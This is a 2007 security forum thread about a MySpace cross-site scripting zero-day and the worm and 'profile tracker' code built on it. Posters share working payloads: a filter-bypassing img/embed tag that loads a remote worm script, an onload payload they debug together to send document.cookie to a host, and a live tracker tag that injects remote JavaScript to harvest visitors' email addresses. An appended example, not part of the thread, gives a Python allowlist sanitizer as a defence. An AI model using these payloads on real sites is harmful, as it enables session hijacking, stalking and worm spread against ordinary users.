Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Myspace (The Worm)
Posted by: digi7al64
Date: January 10, 2007 05:22PM

<img z='<embed ' srcsrc="http://imaqeshack.us/pix.gif"="http://imaqeshack.us/pix.gif" onsrc="y"load="alert('xss')">

meh I was reading a post here when I realised it was another myspace 0 day (all browsers).

Credit to Prophet for finding it.

As for the actual worm the rendered code is

<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" ><script language="javascript" src="http://angeliceyz00.cbstaff.com/worm/request.js">function nothingf(){document.write("jajaja.mov.r{}");}</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Myspace (The Worm)
Posted by: kuza55
Date: January 10, 2007 11:59PM

I don't think Prophet found it, I think he just obtained this vuln from a myspace tracker site. The reason I say this is because if you view the video demo that this site: http://www.profiletracker.us/ has posted on youtube: http://www.youtube.com/watch?v=M3spRkx6aBQ you see that the divs are awfully similar, and the guy does mention that this is somehow related to a myspace tracker.

I could be wrong, but I didn't see him claiming this to be his.....

Re: Myspace (The Worm)
Posted by: jungsonn
Date: January 11, 2007 04:21AM

I hope this thing, or another worm, is going to flush that site down soon, they're really asking for it. It seems that is the best way to learn for them.

Re: Myspace (The Worm)
Posted by: lobas
Date: January 11, 2007 06:02AM

Anyone see problems with these? I'm getting data sent when I sniff but no cookie

<body onload.._=document.location='http://localhost:80'+escape(document.cookie).substr(0,1900)">

Re: Myspace (The Worm)
Posted by: jungsonn
Date: January 11, 2007 10:48AM

That can't work because of a flaw you made.

Look:

<body onload.._=document.location="http://localhost:80+escape(document.cookie).substr(0,1900)">

Re: Myspace (The Worm)
Posted by: maluc
Date: January 11, 2007 11:58AM

escape() is a function:

<body onload.._="document.location='http://localhost:80?'+escape(document.cookie).substr(0,1900)">

so the only change is an initial " before document and a ? after :80 .. the cookie is part of the query not the port

-maluc

Re: Myspace (The Worm)
Posted by: rsnake
Date: January 11, 2007 04:15PM

@kuza55 - Forgive me because I actually got rid of my MySpace account a long time ago. How does that tracker actually get the email address? Is that something that is in the query string or referring URL? The image on http://www.imaqeshack.us/superbig.jpg doesn't show the entire referring URL or the current URL (cuts off). If that's how it's getting it, they are charging $5 a month for trivial information.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Myspace (The Worm)
Posted by: Luny
Date: January 11, 2007 04:27PM

interesting.

Myspace needs to stop putting bandaids on bullet wounds.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Re: Myspace (The Worm)
Posted by: bubbles
Date: January 11, 2007 05:01PM

rsnake Wrote:
-------------------------------------------------------
> @kuza55 - Forgive me because I actually got rid of
> my MySpace account a long time ago. How does that
> tracker actually get the email address? Is that
> something that is in the query string or referring
> URL? The image on
> http://www.imaqeshack.us/superbig.jpg doesn't show
> the entire referring URL or the current URL (cuts
> off). If that's how it's getting it, they are
> charging $5 a month for trivial information.

The email address is in the cookie.

-bubbles
http://webmastertutorials.net

Re: Myspace (The Worm)
Posted by: rsnake
Date: January 12, 2007 01:14PM

Ah, so the tracker was using XSS to steal the cookie? I missed that... that makes way more sense.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Myspace (The Worm)
Posted by: bubbles
Date: January 12, 2007 03:50PM

It's the only way I know of to track who views your myspace.

-bubbles
http://webmastertutorials.net

Re: Myspace (The Worm)
Posted by: rsnake
Date: January 14, 2007 12:42PM

You can track the IP without it, but not the email. That's why I was asking how they got the email.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Myspace (The Worm)
Posted by: Tribute
Date: January 15, 2007 09:02AM

Here's an example (live) tracker:

Myspace code:
<img z='<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" enableHREF="false" saveEmbedTags="true" src="http://pix.gif" ' src="http://stalkertrack.com/pix.gif" onload="var e=document.createElement('script');e.setAttribute('src','http://stalkertrack.com/tracker/sqltrack.js'); document.getElementsByTagName('head')[0].appendChild(e);"/> </style>

Also have a look at the js code:
stalkertrack.com/tracker/sqltrack.js

I didn't paste it as it's a tad long.

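Added example, not part of the thread or any poster's code: a parse-then-allowlist sanitizer run over markup shaped like the tracker code posted above. A real HTML parser sees `z`, `src` and `onload` as three attributes of one `img` tag, so the event handler is dropped however the decoy `z` value is written. The `ALLOWED` policy, the function names and the `example.invalid` host are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed policy for this example: tag -> attributes permitted on it.
ALLOWED = {"img": {"src", "alt"}, "b": set(), "i": set(), "p": set()}

class AllowlistSanitizer(HTMLParser):
    """Rebuild markup from parsed tokens; anything not allowlisted is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped = [], []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.dropped.append(f"<{tag}>")
            return
        kept = []
        for name, value in attrs:
            ok = name in ALLOWED[tag]
            if ok and name == "src":  # only plain web URLs, no script schemes
                ok = urlparse(value or "").scheme in ("http", "https")
            if ok:
                kept.append(f' {name}="{escape(value or "", quote=True)}"')
            else:
                self.dropped.append(f"{tag}@{name}")
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # "<img ... />": no separate end tag

    def handle_endtag(self, tag):
        keep = tag in ALLOWED and tag != "img"  # img is void, never closed
        (self.out if keep else self.dropped).append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is re-encoded

def sanitize(markup):
    """Return (clean_markup, list_of_dropped_items)."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out), parser.dropped

# Constructed sample shaped like the posted tracker markup; host is a placeholder.
SAMPLE = ("<img z='<embed allowScriptAccess=\"never\" src=\"http://pix.gif\" ' "
          "src=\"http://tracker.example.invalid/pix.gif\" "
          "onload=\"var e=document.createElement('script');\"/> </style>")
```

Calling `sanitize(SAMPLE)` returns the rebuilt markup together with the list of dropped tags and attributes, which can be logged to spot profiles that keep submitting event handlers.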
Re: Myspace (The Worm)
Posted by: rsnake
Date: January 15, 2007 04:28PM

haha... Firefox thinks it's a phishing site. What else has been on that server?

- RSnake
Gotta love it. http://ha.ckers.org

Re: Myspace (The Worm)
Posted by: bubbles
Date: January 15, 2007 07:25PM

They used to carry out mass phishing attacks on myspace. I remember reading bulletins and going to websites like google.com?url=whatevertheblogis.com and they were advertising a tracker back then too, but instead they just stole your password. Now they still advertise the tracker, but I'm not even sure they have one.

-bubbles
http://webmastertutorials.net

Re: Myspace (The Worm)
Date: January 16, 2007 08:45PM

So this is the worm that's causing myspace phishing, including Tom's hacked profile?
